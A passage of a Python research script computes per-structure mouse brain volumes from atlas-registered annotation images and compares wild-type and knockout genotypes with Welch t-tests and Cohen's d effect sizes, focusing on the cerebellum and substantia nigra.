removed\r\n mouse_table_reference = pd.merge(left=structure, right=mouse_table_reference,\r\n left_on='id_custom', right_on='VolumeInteger', how='outer')\r\n mouse_table_reference.loc[np.isnan(mouse_table_reference['VoxelNumber']), 'VoxelNumber'] = 0\r\n mouse_table_reference.loc[np.isnan(mouse_table_reference['Volume']), 'Volume'] = 0\r\n\r\n # print number of nonzero volumes remaining after merge, which should be the same\r\n print(np.sum(mouse_table_reference['Volume'] != 0))\r\n mouse_table_reference['isLowestLevel'] = np.logical_not(np.isnan(mouse_table_reference['VolumeInteger']))\r\n rootVol = np.array(mouse_table_reference.loc[mouse_table_reference['name'] == 'root', 'Volume'])\r\n print(f'Root volume before addition is {rootVol}')\r\n\r\n # Fill in structures without a volume by summing relevant lower level structures\r\n for iVolume in range(mouse_table_reference.shape[0]):\r\n # only include structures with volumes here\r\n if (not np.isnan(mouse_table_reference.loc[iVolume, 'VolumeInteger'])) & isinstance(\r\n mouse_table_reference.loc[iVolume, 'structure_id_path_custom'], str):\r\n for iParent in list(\r\n map(int, mouse_table_reference.loc[iVolume, 'structure_id_path_custom'].strip('][').split(', ')))[\r\n :-1]:\r\n # Add volume to each parent\r\n mouse_table_reference.loc[mouse_table_reference['id_custom'] == iParent, 'Volume'] += \\\r\n mouse_table_reference.loc[iVolume, 'Volume']\r\n mouse_table_reference.loc[mouse_table_reference['id_custom'] == iParent, 'VoxelNumber'] += \\\r\n mouse_table_reference.loc[iVolume, 'VoxelNumber']\r\n rootVol = np.array(mouse_table_reference.loc[mouse_table_reference['name'] == 'root', 'Volume'])\r\n print(f'Root volume after addition is {rootVol}')\r\n\r\n return mouse_table_reference\r\n\r\n\r\n# Define\r\ndata_path = os.path.join('Data', 'Mouse', 'Processed_Old')\r\ndata_new_path = os.path.join('Data', 'Mouse', 'Processed')\r\nreference_path = os.path.join('Data', 'Mouse', 'Reference')\r\nanalysis_path = os.path.join('Data', 'Mouse', 'Analysis')\r\npername_merged_path = os.path.join('..', 'cell-counting', 'pername_merged_table.csv')\r\nmouse_path_list = glob.glob(os.path.join(data_path, '*', '*invsynned*cerebellum_lobular.nii.gz'))\r\ncomb_str = 'main' 
#########################################\r\nreference_structure_path = os.path.join(reference_path, 'structure_graph_plus' + '_' + comb_str + '.csv')\r\nvoxel_reference_volume = 0.000125\r\nvoxel_volume = 0.000125\r\nannotation_path = os.path.join(reference_path, 'annotation_25_reoriented.nii.gz')\r\nannotation_image = nib.load(annotation_path)\r\nannotation = annotation_image.get_fdata()\r\nannotation_lowLevel_list = list(np.unique(annotation))\r\nnIterBootstrap = 1 #####################################################################################################\r\nvolInt_hemispheres = [1101, 354, 511, 219, 1041]\r\nsn_ids = [54, 268, 2001] # compact and reticular respectively\r\n\r\n# Follows\r\nnMouse = len(mouse_path_list)\r\nstructure = pd.read_csv(reference_structure_path)\r\npername_merged_table = pd.read_csv(pername_merged_path)\r\nPath(os.path.join(analysis_path, 'perstructure')).mkdir(parents=True, exist_ok=True)\r\n\r\n# Reference volumes\r\nreference_table = image2volumetable(annotation_path)\r\n\r\n# Fill in reference additional reference volumes explicitly\r\nreference_table.loc[reference_table['name'] == 'cerebellum lobules I-III', 'Volume'] = \\\r\n float(reference_table.loc[reference_table['name'] == 'Lingula (I)', 'Volume']) + \\\r\n float(reference_table.loc[reference_table['name'] == 'Lobule II', 'Volume']) + \\\r\n float(reference_table.loc[reference_table['name'] == 'Lobule III', 'Volume'])\r\nreference_table.loc[reference_table['name'] == 'cerebellum lobules VI-VII', 'Volume'] = \\\r\n float(reference_table.loc[reference_table['name'] == 'Declive (VI)', 'Volume']) + \\\r\n float(reference_table.loc[reference_table['name'] == 'Simple lobule', 'Volume']) + \\\r\n float(reference_table.loc[reference_table['name'] == 'Folium-tuber vermis (VII)', 'Volume']) + \\\r\n float(reference_table.loc[reference_table['name'] == 'Paramedian lobule', 'Volume'])\r\nreference_table.loc[reference_table['name'] == 'cerebellum lobules VIII-IX', 'Volume'] = \\\r\n float(reference_table.loc[reference_table['name'] == 'Pyramus (VIII)', 'Volume']) + \\\r\n float(reference_table.loc[reference_table['name'] == 'Copula pyramidis', 'Volume']) + \\\r\n float(reference_table.loc[reference_table['name'] == 'Uvula (IX)', 'Volume'])\r\nreference_table.loc[reference_table['name'] == 'cerebellum vestibulo', 'Volume'] = \\\r\n float(reference_table.loc[reference_table['name'] == 'Nodulus (X)', 'Volume']) + \\\r\n float(reference_table.loc[reference_table['name'] == 'Paraflocculus', 'Volume']) + \\\r\n float(reference_table.loc[reference_table['name'] == 'Flocculus', 'Volume'])\r\nreference_table.loc[reference_table['name'] == 'cerebellum hemispheres', 'Volume'] = \\\r\n float(reference_table.loc[reference_table['name'] == 'Simple lobule', 'Volume']) + \\\r\n float(reference_table.loc[reference_table['name'] == 'Paramedian lobule', 'Volume']) + \\\r\n float(reference_table.loc[reference_table['name'] == 'Crus 1', 'Volume']) + \\\r\n float(reference_table.loc[reference_table['name'] == 'Crus 2', 'Volume']) + \\\r\n float(reference_table.loc[reference_table['name'] == 'Copula pyramidis', 'Volume']) + \\\r\n float(reference_table.loc[reference_table['name'] == 'Flocculus', 'Volume'])\r\nannotation_hemispheres = np.where(np.isin(annotation, volInt_hemispheres))\r\nannotation_brain = np.where(annotation > 0)\r\nmid_LR_image = annotation.shape[0] / 2\r\nmid_LR_hemispheres = np.mean(annotation_hemispheres[0])\r\nmid_LR_brain = np.mean(annotation_brain[0])\r\n# print(f'Mid LR of hemispheres = 
{mid_LR_hemispheres}, '\r\n# f'mid LR of image is {mid_LR_image}, '\r\n# f'mid LR of brain is {mid_LR_brain}')\r\nreference_table.loc[reference_table['name'] == 'cerebellum left hemisphere', 'Volume'] = \\\r\n np.sum(annotation_hemispheres[0] <= mid_LR_brain) * voxel_reference_volume\r\nreference_table.loc[reference_table['name'] == 'cerebellum right hemisphere', 'Volume'] = \\\r\n np.sum(annotation_hemispheres[0] > mid_LR_brain) * voxel_reference_volume\r\n\r\nreference_table.to_csv(os.path.join(analysis_path, 'reference_volumes_mouse'))\r\n\r\nreference_table['in_cerebellum'] = False\r\nreference_table['nPath'] = 0\r\nfor iVolume in range(reference_table.shape[0]):\r\n if isinstance(reference_table.loc[iVolume, 'structure_id_path_custom'], str):\r\n structure_id_path_custom = list(map(int, reference_table.loc[iVolume, 'structure_id_path_custom'].strip('][').split(', ')))\r\n reference_table.loc[iVolume, 'in_cerebellum'] = 1186 in structure_id_path_custom\r\n reference_table.loc[iVolume, 'nPath'] = len(structure_id_path_custom)\r\nreference_cerebellum_table = reference_table[reference_table['in_cerebellum']][\r\n ['name', 'acronym', 'id_custom', 'structure_id_path_custom', 'VoxelNumber', 'Volume']]\r\nreference_cerebellum_table.to_csv(os.path.join(analysis_path, 'reference_volumes_cerebellum_mouse.csv'))\r\n\r\nreference_table['in_sn'] = False\r\nfor iVolume in range(reference_table.shape[0]):\r\n if isinstance(reference_table.loc[iVolume, 'structure_id_path_custom'], str):\r\n reference_table.loc[iVolume, 'in_sn'] = 2001 in list(\r\n map(int, reference_table.loc[iVolume, 'structure_id_path_custom'].strip('][').split(', ')))\r\nreference_sn_table = reference_table[reference_table['in_sn']][\r\n ['name', 'acronym', 'id_custom', 'structure_id_path_custom', 'VoxelNumber', 'Volume']]\r\nreference_sn_table.to_csv(os.path.join(analysis_path, 'reference_volumes_sn_mouse.csv'))\r\n\r\n# get lowest level volume integers\r\nlowestLevel_volInt_list = list(reference_table.loc[reference_table['isLowestLevel'], 'VolumeInteger'])\r\nlowestLevel_volInt_ce_list = list()\r\nlowestLevel_volInt_mi_list = list()\r\nfor volInt in lowestLevel_volInt_list:\r\n id_custom_path = list(map(int, reference_table.loc[reference_table['id_custom'] == volInt, 'structure_id_path_custom'].iloc[0].strip('][').split(', ')))\r\n if np.isin(1186, id_custom_path):\r\n lowestLevel_volInt_ce_list.append(int(volInt))\r\n if np.isin(834, id_custom_path):\r\n lowestLevel_volInt_mi_list.append(int(volInt))\r\nlowestLevel_volInt_ce_list = list(set(lowestLevel_volInt_ce_list) - set([1186]))\r\nlowestLevel_volInt_mi_list = list(set(lowestLevel_volInt_mi_list) - set([834]))\r\nlowestLevel_volInt_mice_list = lowestLevel_volInt_mi_list + lowestLevel_volInt_ce_list\r\nlowestLevel_volInt_ceSN_list = lowestLevel_volInt_ce_list + [54, 268] # 1241 is VTA, this is manually corrected selection, might include some higher order structures still however\r\n\r\n\r\n\r\nmouse_table_list = list()\r\nfor iMouse, Mouse in enumerate(mouse_path_list):\r\n subject = Mouse.split(os.path.sep)[-2]\r\n print(Mouse)\r\n print(subject)\r\n mouse_table = image2volumetable(Mouse)\r\n mouse_table.to_csv(os.path.join(analysis_path, subject + '_volumes_mouse.csv'))\r\n\r\n mouse_table['Mouse'] = subject\r\n mouse_table['Genotype'] = subject.split('_')[0]\r\n mouse_table['Sex'] = subject.split('_')[-1]\r\n mouse_table.loc[mouse_table['Sex'] != 'female', 'Sex'] = 'male'\r\n mouse_table = mouse_table[['Mouse', 'Genotype', 'Sex', 'name', 'acronym', 'id_custom', 
'structure_id_path_custom',\r\n 'VoxelNumber', 'Volume']]\r\n\r\n mouse_table_list.append(mouse_table)\r\n\r\nmouse_table_all = pd.concat(mouse_table_list, ignore_index=True)\r\n\r\nreference_table['rVolume'] = reference_table['Volume']\r\noutput_table_all = pd.merge(left=mouse_table_all,\r\n right=reference_table.loc[:, ['id_custom', 'name', 'rVolume', 'include_in_test']],\r\n left_on=['id_custom', 'name'],\r\n right_on=['id_custom', 'name'],\r\n how='right')\r\n\r\n####################################################### are subjects the same for index and assigned?\r\n# Fill in reference additional reference volumes explicitly\r\noutput_table_all.loc[output_table_all['name'] == 'cerebellum lobules I-III', 'Volume'] = \\\r\n np.array(output_table_all.loc[output_table_all['name'] == 'Lingula (I)', 'Volume']) + \\\r\n np.array(output_table_all.loc[output_table_all['name'] == 'Lobule II', 'Volume']) + \\\r\n np.array(output_table_all.loc[output_table_all['name'] == 'Lobule III', 'Volume'])\r\noutput_table_all.loc[output_table_all['name'] == 'cerebellum lobules VI-VII', 'Volume'] = \\\r\n np.array(output_table_all.loc[output_table_all['name'] == 'Declive (VI)', 'Volume']) + \\\r\n np.array(output_table_all.loc[output_table_all['name'] == 'Simple lobule', 'Volume']) + \\\r\n np.array(output_table_all.loc[output_table_all['name'] == 'Folium-tuber vermis (VII)', 'Volume']) + \\\r\n np.array(output_table_all.loc[output_table_all['name'] == 'Paramedian lobule', 'Volume'])\r\noutput_table_all.loc[output_table_all['name'] == 'cerebellum lobules VIII-IX', 'Volume'] = \\\r\n np.array(output_table_all.loc[output_table_all['name'] == 'Pyramus (VIII)', 'Volume']) + \\\r\n np.array(output_table_all.loc[output_table_all['name'] == 'Copula pyramidis', 'Volume']) + \\\r\n np.array(output_table_all.loc[output_table_all['name'] == 'Uvula (IX)', 'Volume'])\r\noutput_table_all.loc[output_table_all['name'] == 'cerebellum vestibulo', 'Volume'] = \\\r\n np.array(output_table_all.loc[output_table_all['name'] == 'Nodulus (X)', 'Volume']) + \\\r\n np.array(output_table_all.loc[output_table_all['name'] == 'Paraflocculus', 'Volume']) + \\\r\n np.array(output_table_all.loc[output_table_all['name'] == 'Flocculus', 'Volume'])\r\noutput_table_all.loc[output_table_all['name'] == 'cerebellum hemispheres', 'Volume'] = \\\r\n np.array(output_table_all.loc[output_table_all['name'] == 'Simple lobule', 'Volume']) + \\\r\n np.array(output_table_all.loc[output_table_all['name'] == 'Paramedian lobule', 'Volume']) + \\\r\n np.array(output_table_all.loc[output_table_all['name'] == 'Crus 1', 'Volume']) + \\\r\n np.array(output_table_all.loc[output_table_all['name'] == 'Crus 2', 'Volume']) + \\\r\n np.array(\r\n output_table_all.loc[output_table_all['name'] == 'Copula pyramidis', 'Volume']) # [1101, 354, 511, 219, 1041]\r\nfor iMouse, Mouse in enumerate(mouse_path_list):\r\n subject = Mouse.split(os.path.sep)[-2]\r\n print(f'LR hemisphere calculation, subject = {subject}')\r\n\r\n # load corrected annotation in native space\r\n mouse_image = nib.load(Mouse)\r\n mouse_image_array = mouse_image.get_fdata()\r\n\r\n # load flirt\r\n flirt_path = os.path.join(data_path, subject, 'FLIRT', subject + '_to_allen_model_warpaffine.mat')\r\n with open(flirt_path, 'r') as f:\r\n txt = f.read()\r\n flirt = np.array([[float(num) for num in item.split()] for item in txt.split('\\n')[:-1]])\r\n # print(flirt)\r\n\r\n # calculate voxel center and flirted coordinate center\r\n mouse_voxel_image_center = np.array(list(np.array(mouse_image.shape) / 2) + 
[1])\r\n mouse_voxel_brain_center = np.array(list(np.mean(np.where((mouse_image_array > 0)), axis=1)) + [1])\r\n annotation_hemispheres = np.where(np.isin(mouse_image_array.astype(int), volInt_hemispheres))\r\n mouse_voxel_hemisphere_center = np.array(list(np.mean(annotation_hemispheres, axis=1)) + [1])\r\n\r\n mouse_flirted_image_center = flirt.dot(mouse_image.affine.dot(mouse_voxel_image_center))\r\n mouse_flirted_brain_center = flirt.dot(mouse_image.affine.dot(mouse_voxel_brain_center))\r\n mouse_flirted_hemisphere_center = flirt.dot(mouse_image.affine.dot(mouse_voxel_hemisphere_center))\r\n\r\n # print(f'center_voxel_image = {mouse_voxel_image_center}, ')\r\n # print(f'center_voxel_brain = {mouse_voxel_brain_center}, ')\r\n # print(f'center_voxel_hemispheres = {mouse_voxel_hemisphere_center}')\r\n #\r\n # print(f'center_flirted_image = {mouse_flirted_image_center}, ')\r\n # print(f'center_flirted_brain = {mouse_flirted_brain_center}, ')\r\n # print(f'center_flirted_hemispheres = {mouse_flirted_hemisphere_center}')\r\n\r\n annotation_hemispheres_L = np.empty(len(annotation_hemispheres[0]))\r\n annotation_hemispheres_L[:] = False\r\n for iPoint in range(len(annotation_hemispheres[0])):\r\n iPoint_voxCoord = np.array([annotation_hemispheres[0][iPoint],\r\n annotation_hemispheres[1][iPoint],\r\n annotation_hemispheres[2][iPoint], 1])\r\n iPoint_Coord = mouse_image.affine.dot(iPoint_voxCoord)\r\n # iPoint_Coord[3] = 1\r\n iPoint_flirted_Coord = flirt.dot(iPoint_Coord)\r\n\r\n # print(f'mouse_flirted_brain_center = {mouse_flirted_brain_center}, ')\r\n # print(f'iPoint_flirted_Coord = {iPoint_flirted_Coord}, ')\r\n annotation_hemispheres_L[iPoint] = iPoint_flirted_Coord[0] < mouse_flirted_brain_center[0]\r\n annotation_hemispheres_R = np.logical_not(annotation_hemispheres_L)\r\n\r\n output_table_all.loc[np.logical_and(output_table_all['name'] == 'cerebellum left hemisphere',\r\n output_table_all['Mouse'] == subject), 'Volume'] = \\\r\n np.sum(annotation_hemispheres_L) * voxel_reference_volume\r\n output_table_all.loc[np.logical_and(output_table_all['name'] == 'cerebellum right hemisphere',\r\n output_table_all['Mouse'] == subject), 'Volume'] = \\\r\n np.sum(annotation_hemispheres_R) * voxel_reference_volume\r\n\r\n # annotation_hemispheres_flirtedRigid = annotation_hemispheres[0]\r\n # annotation_flirted_path = os.path.join(data_path, subject, 'FLIRT', subject + '_inmasked_flirted.nii.gz') ######## different reference used! change to reference\r\n # annotation_flirted_image = nib.load(annotation_flirted_path)\r\n # annotation_flirtedRigid_path = os.path.join(data_new_path, subject, subject + '_annotation_flirtedRigid.nii.gz') ######## different reference used! change to reference\r\n # annotation_flirtedRigid_image = nib.load(annotation_flirtedRigid_path)\r\n # annotation_or_path = os.path.join(data_new_path, subject, subject + '_annotation.nii.gz') ######## different reference used! 
change to reference\r\n # annotation_or_image = nib.load(annotation_or_path)\r\n # annotation_flirted = annotation_flirted_image.get_fdata()\r\n # print(annotation_flirted_image.affine)\r\n # annotation_flirted_hemispheres = np.where(np.isin(annotation_flirted.astype(int), volInt_hemispheres))\r\n # LR_center_flirted_image = annotation_flirted_image.affine.dot(\r\n # np.array(list(np.array(annotation_flirted_image.shape) / 2) + [1]))\r\n # LR_center_flirted_brain = annotation_flirted_image.affine.dot(\r\n # np.array(list(np.mean(np.where(annotation_flirted > 0), axis=1)) + [1]))\r\n # LR_center_flirted_hemispheres = annotation_flirted_image.affine.dot(\r\n # np.array(list(np.mean(annotation_flirted_hemispheres, axis=1)) + [1]))\r\n\r\n # flirtRigid_path = os.path.join(data_new_path, subject, subject + '_flirtRigid.mat')\r\n # with open(flirtRigid_path, 'r') as f:\r\n # txt = f.read()\r\n # flirtRigid = np.array([[float(num) for num in item.split()] for item in txt.split('\\n')[:-1]])\r\n # print(flirtRigid)\r\n\r\n # mouse_masked_flirted_syn_path = os.path.join(data_new_path, subject, subject + '_flirted_syn.pickle.gz')\r\n # with open(mouse_masked_flirted_syn_path, 'rb') as f:\r\n # [mapping, metric, level_iters, sdr] = load(f, compression='gzip')\r\n\r\noutput_table_all['VolumeNormalized'] = output_table_all['Volume'] / output_table_all['rVolume']\r\n\r\n# For each subject add mask volumes for normalization\r\noutput_table_all['rootVolume'] = np.nan\r\nfor subject in np.unique(output_table_all['Mouse']):\r\n output_table_all.loc[output_table_all['Mouse'] == subject, 'rootVolume'] = float(output_table_all.loc[\r\n np.logical_and(\r\n output_table_all[\r\n 'Mouse'] == subject,\r\n output_table_all[\r\n 'name'] == 'root'), 'Volume'])\r\n\r\noutput_table_all['VolumeRootNormalized'] = output_table_all['Volume'] / output_table_all['rootVolume']\r\n\r\n\r\n# Writing output_table_all\r\noutput_table_all_copy = output_table_all.copy()\r\noutput_table_all = pd.merge(left=output_table_all, right=reference_table[['id_custom', 'in_cerebellum', 'nPath']],\r\n left_on='id_custom', right_on='id_custom') # add in_cerebellum column\r\n\r\n# For each structure calculate WT_30_female percentual difference\r\n# For each structure calculate mean with or without WT_30 and normalize VolumeRootNormalized with mean\r\ngrouped = output_table_all.groupby('name')\r\ngroup_list = list()\r\ngroup_WTmean_list = list()\r\nfor name, group in grouped:\r\n # print(f'name={name}')\r\n\r\n vol_WT30 = group.loc[group['Mouse'] == 'WT_30_female', 'Volume'].iloc[0]\r\n vol_mean = np.mean(group.loc[np.logical_and(np.logical_and(group['Mouse'] != 'WT_30_female', group['Genotype'] == 'WT'), group['Mouse'] != 'WT_50'), 'Volume'])\r\n perc_diff = ((vol_mean - vol_WT30) / vol_mean) * 100\r\n\r\n # get id_custom for name\r\n id_custom = group['id_custom'].iloc[0]\r\n acronym = group['acronym'].iloc[0]\r\n\r\n group_list.append(pd.DataFrame({'name': [name],\r\n 'id_custom': [id_custom],\r\n 'WT30_perc_diff' : [perc_diff]}))\r\n\r\n if group['in_cerebellum'].iloc[0] | np.any(np.isin(group['id_custom'], sn_ids)):\r\n WT_mean = np.mean(group.loc[group['Genotype'] == 'WT', 'VolumeRootNormalized'])\r\n WT_30_excluded = False\r\n else:\r\n WT_mean = np.mean(group.loc[np.logical_and(group['Mouse'] != 'WT_30_female', group['Genotype'] == 'WT'), 'VolumeRootNormalized'])\r\n WT_30_excluded = True\r\n VolumeRootNormalizedWTmean = list((group['VolumeRootNormalized'] / WT_mean) * 100)\r\n\r\n name_list = list()\r\n id_custom_list = list()\r\n 
WT_30_excluded_list = list()\r\n WT_mean_list = list()\r\n for i in range(len(VolumeRootNormalizedWTmean)):\r\n name_list.append(name)\r\n id_custom_list.append(id_custom)\r\n WT_30_excluded_list.append(WT_30_excluded)\r\n WT_mean_list.append(WT_mean)\r\n group_WTmean_list.append(pd.DataFrame({'Mouse': list(group['Mouse']),\r\n 'name': name_list,\r\n 'id_custom': id_custom_list,\r\n 'WT_mean': WT_mean_list,\r\n 'WT_30_excluded': WT_30_excluded_list,\r\n 'VolumeRootNormalizedWTmean' : VolumeRootNormalizedWTmean}))\r\n\r\ngroup_table = pd.concat(group_list, ignore_index=True)\r\ngroup_table_path = os.path.join(analysis_path, 'WT30_perc_diff.csv')\r\nprint(f'Writing {group_table_path}')\r\ngroup_table = group_table.sort_values(by='WT30_perc_diff')\r\ngroup_table = group_table[np.logical_not(np.isnan(group_table['WT30_perc_diff']))]\r\ngroup_table = group_table[group_table['id_custom'] != 0]\r\ngroup_table.to_csv(group_table_path)\r\n # print(f'group={group}')\r\ngroup_WTmean_table = pd.concat(group_WTmean_list, ignore_index=True)\r\noutput_table_all = pd.merge(left=output_table_all, right=group_WTmean_table[['Mouse', 'id_custom', 'WT_mean', 'WT_30_excluded',\r\n 'VolumeRootNormalizedWTmean']],\r\n left_on=['Mouse', 'id_custom'], right_on=['Mouse', 'id_custom'])\r\n\r\n\r\n# Filter out non-cerebellar structures in output_table_all\r\n\r\n\r\n# Filter out WT_30 non-cerebellum and SN, or in other words remove WT_30 while keeping all cerebellum and SN\r\nce_or_sn = np.logical_or(output_table_all['in_cerebellum'], np.isin(output_table_all['id_custom'], sn_ids))\r\noutput_table_all_withWT30_path = os.path.join(analysis_path, 'all_volumes_mouse_withWT30.csv')\r\noutput_table_all.to_csv(output_table_all_withWT30_path)\r\noutput_table_all = output_table_all[np.logical_or(output_table_all['Mouse'] != 'WT_30_female', ce_or_sn)] ########################\r\n# output_table_all = output_table_all[output_table_all['Mouse'] != 'WT_30_female'] ########################\r\noutput_table_all_path = os.path.join(analysis_path, 'all_volumes_mouse.csv')\r\nprint(f'Writing {output_table_all_path}')\r\noutput_table_all.to_csv(output_table_all_path)\r\n\r\noutput_table_cerebellum = pd.merge(left=output_table_all_copy, right=reference_table[['id_custom', 'in_cerebellum']],\r\n left_on='id_custom', right_on='id_custom')\r\noutput_table_cerebellum = output_table_cerebellum[output_table_cerebellum['in_cerebellum']]\r\noutput_table_cerebellum = output_table_cerebellum[output_table_cerebellum['rVolume'] != 0]\r\noutput_table_cerebellum = output_table_cerebellum.drop('in_cerebellum', 1)\r\noutput_table_cerebellum.to_csv(os.path.join(analysis_path, 'cerebellum_volumes_mouse.csv'))\r\n\r\noutput_table_cerebellum = pd.merge(left=output_table_all, right=reference_table[['id_custom', 'in_sn']],\r\n left_on='id_custom', right_on='id_custom')\r\noutput_table_cerebellum = output_table_cerebellum[output_table_cerebellum['in_sn']]\r\noutput_table_cerebellum = output_table_cerebellum.drop('in_sn', 1)\r\noutput_table_cerebellum.to_csv(os.path.join(analysis_path, 'sn_volumes_mouse.csv'))\r\n\r\n# In volume table, go through each structure and determine the p-value between genotypes, create a new p-value table\r\nanalysis_pername_path = os.path.join(analysis_path, 'pername_selWT30')\r\nos.makedirs(analysis_pername_path, exist_ok=True)\r\npername_table_path_list = [os.path.join(analysis_pername_path, 'pername_volumes_mouse.csv'),\r\n os.path.join(analysis_pername_path, 'pername_1_volumes_mouse_' + comb_str + '.csv'),\r\n 
os.path.join(analysis_pername_path, 'pername_2_volumes_mouse_' + comb_str + '.csv'),\r\n os.path.join(analysis_pername_path, 'pername_3_volumes_mouse_' + comb_str + '.csv'),\r\n os.path.join(analysis_pername_path, 'pername_mi_volumes_mouse_' + comb_str + '.csv'),\r\n os.path.join(analysis_pername_path, 'pername_ce_volumes_mouse_' + comb_str + '.csv'),\r\n os.path.join(analysis_pername_path, 'pername_mice_volumes_mouse_' + comb_str + '.csv'),\r\n os.path.join(analysis_pername_path, 'pername_ceSN_volumes_mouse_' + comb_str + '.csv')]\r\npername_cerebellum_table_path_list = [os.path.join(analysis_pername_path, 'pername_cerebellum_volumes_mouse.csv'),\r\n os.path.join(analysis_pername_path,\r\n 'pername_1_cerebellum_volumes_mouse_' + comb_str + '.csv'),\r\n os.path.join(analysis_pername_path,\r\n 'pername_2_cerebellum_volumes_mouse_' + comb_str + '.csv'),\r\n os.path.join(analysis_pername_path,\r\n 'pername_3_cerebellum_volumes_mouse_' + comb_str + '.csv'),\r\n os.path.join(analysis_pername_path,\r\n 'pername_mi_cerebellum_volumes_mouse_' + comb_str + '.csv'),\r\n os.path.join(analysis_pername_path,\r\n 'pername_ce_cerebellum_volumes_mouse_' + comb_str + '.csv'),\r\n os.path.join(analysis_pername_path,\r\n 'pername_mice_cerebellum_volumes_mouse_' + comb_str + '.csv'),\r\n os.path.join(analysis_pername_path,\r\n 'pername_ceSN_cerebellum_volumes_mouse_' + comb_str + '.csv')]\r\npername_sn_table_path_list = [os.path.join(analysis_pername_path, 'pername_sn_volumes_mouse.csv'),\r\n os.path.join(analysis_pername_path, 'pername_1_sn_volumes_mouse_' + comb_str + '.csv'),\r\n os.path.join(analysis_pername_path, 'pername_2_sn_volumes_mouse_' + comb_str + '.csv'),\r\n os.path.join(analysis_pername_path, 'pername_3_sn_volumes_mouse_' + comb_str + '.csv'),\r\n os.path.join(analysis_pername_path, 'pername_mi_sn_volumes_mouse_' + comb_str + '.csv'),\r\n os.path.join(analysis_pername_path, 'pername_ce_sn_volumes_mouse_' + comb_str + '.csv'),\r\n os.path.join(analysis_pername_path, 'pername_mice_sn_volumes_mouse_' + comb_str + '.csv'),\r\n os.path.join(analysis_pername_path, 'pername_ceSN_sn_volumes_mouse_' + comb_str + '.csv')]\r\nfor iIncludeInTest in [0, 1, 2, 3, 4, 5, 6, 7]: # 4 5 6 add, ce-mid, ce and mid\r\n print(f'iIncludeInTest = {iIncludeInTest}')\r\n mouse_table_pername_list = list()\r\n mouse_table_all_nobackground = output_table_all.loc[np.logical_not(pd.isnull(output_table_all['name']))]\r\n if (iIncludeInTest == 1) | (iIncludeInTest == 2):\r\n mouse_table_all_nobackground = mouse_table_all_nobackground[\r\n mouse_table_all_nobackground['include_in_test'] == iIncludeInTest]\r\n elif iIncludeInTest == 3:\r\n mouse_table_all_nobackground = mouse_table_all_nobackground[np.isin(mouse_table_all_nobackground['id_custom'], lowestLevel_volInt_list)]\r\n elif iIncludeInTest == 4:\r\n mouse_table_all_nobackground = mouse_table_all_nobackground[np.isin(mouse_table_all_nobackground['id_custom'], lowestLevel_volInt_mi_list)]\r\n elif iIncludeInTest == 5:\r\n mouse_table_all_nobackground = mouse_table_all_nobackground[np.isin(mouse_table_all_nobackground['id_custom'], lowestLevel_volInt_ce_list)]\r\n elif iIncludeInTest == 6:\r\n mouse_table_all_nobackground = mouse_table_all_nobackground[np.isin(mouse_table_all_nobackground['id_custom'], lowestLevel_volInt_mice_list)]\r\n elif iIncludeInTest == 7:\r\n mouse_table_all_nobackground = mouse_table_all_nobackground[np.isin(mouse_table_all_nobackground['id_custom'], lowestLevel_volInt_ceSN_list)]\r\n # mouse_table_all.loc[pd.isnull(mouse_table_all['name']), 'name'] 
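The three path lists above differ only in an infix (`''`, `'cerebellum_'`, `'sn_'`) and a per-test label, so they can be generated rather than hand-written. A sketch under the assumption that `analysis_pername_path` and `comb_str` are as defined earlier in the script; the label order tracks `iIncludeInTest` 0–7:

```python
import os

labels = ['', '1_', '2_', '3_', 'mi_', 'ce_', 'mice_', 'ceSN_']

def pername_paths(kind=''):
    # kind is '', 'cerebellum_' or 'sn_'; only the unlabeled first entry
    # omits the comb_str suffix, matching the hand-written lists.
    return [os.path.join(analysis_pername_path,
                         'pername_' + lab + kind + 'volumes_mouse'
                         + ('' if lab == '' else '_' + comb_str) + '.csv')
            for lab in labels]

pername_table_path_list            = pername_paths()
pername_cerebellum_table_path_list = pername_paths('cerebellum_')
pername_sn_table_path_list         = pername_paths('sn_')
```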
= 'background'\r\n name_uniq = np.unique(np.array(mouse_table_all_nobackground['name'].astype('category')))\r\n nName = len(name_uniq)\r\n for nameStruct in name_uniq:\r\n mouse_table_nameStruct = mouse_table_all_nobackground[mouse_table_all_nobackground['name'] == nameStruct]\r\n mouse_table_nameStruct_WT = mouse_table_nameStruct.loc[mouse_table_nameStruct['Genotype'] == 'WT']\r\n mouse_table_nameStruct_KO = mouse_table_nameStruct.loc[mouse_table_nameStruct['Genotype'] == 'KO']\r\n [t_stat, p_val] = ttest_ind(mouse_table_nameStruct_WT['Volume'],\r\n mouse_table_nameStruct_KO['Volume'],\r\n equal_var=False)\r\n [t_stat_RN, p_val_RN] = ttest_ind(mouse_table_nameStruct_WT['VolumeRootNormalized'],\r\n mouse_table_nameStruct_KO['VolumeRootNormalized'],\r\n equal_var=False)\r\n mean_WT = np.mean(mouse_table_nameStruct_WT['Volume'])\r\n mean_KO = np.mean(mouse_table_nameStruct_KO['Volume'])\r\n std_WT = np.std(mouse_table_nameStruct_WT['Volume'])\r\n std_KO = np.std(mouse_table_nameStruct_KO['Volume'])\r\n mean_WT_AN = np.mean(mouse_table_nameStruct_WT['VolumeNormalized'])\r\n mean_KO_AN = np.mean(mouse_table_nameStruct_KO['VolumeNormalized'])\r\n std_WT_AN = np.std(mouse_table_nameStruct_WT['VolumeNormalized'])\r\n std_KO_AN = np.std(mouse_table_nameStruct_KO['VolumeNormalized'])\r\n mean_WT_RN = np.mean(mouse_table_nameStruct_WT['VolumeRootNormalized'])\r\n mean_KO_RN = np.mean(mouse_table_nameStruct_KO['VolumeRootNormalized'])\r\n std_WT_RN = np.std(mouse_table_nameStruct_WT['VolumeRootNormalized'])\r\n std_KO_RN = np.std(mouse_table_nameStruct_KO['VolumeRootNormalized'])\r\n\r\n\r\n\r\n nWT = len(mouse_table_nameStruct_WT['Volume'])\r\n nKO = len(mouse_table_nameStruct_KO['Volume'])\r\n N = nWT + nKO\r\n # print(f'nWT{nWT}, nKO={nKO}, N={N}')\r\n S_p = np.sqrt(((nWT - 1) * np.power(std_WT, 2) + (nKO - 1) * np.power(std_KO, 2)) / (N - 2))\r\n S_p_AN = np.sqrt(((nWT - 1) * np.power(std_WT_AN, 2) + (nKO - 1) * np.power(std_KO_AN, 2)) / (N - 2))\r\n S_p_RN = np.sqrt(((nWT - 1) * np.power(std_WT_RN, 2) + (nKO - 1) * np.power(std_KO_RN, 2)) / (N - 2))\r\n cohenD = (mean_WT - mean_KO) / S_p\r\n cohenD_AN = (mean_WT_AN - mean_KO_AN) / S_p_AN\r\n cohenD_RN = (mean_WT_RN - mean_KO_RN) / S_p_RN\r\n\r\n S_a = np.sqrt((np.power(std_WT, 2) + np.power(std_KO, 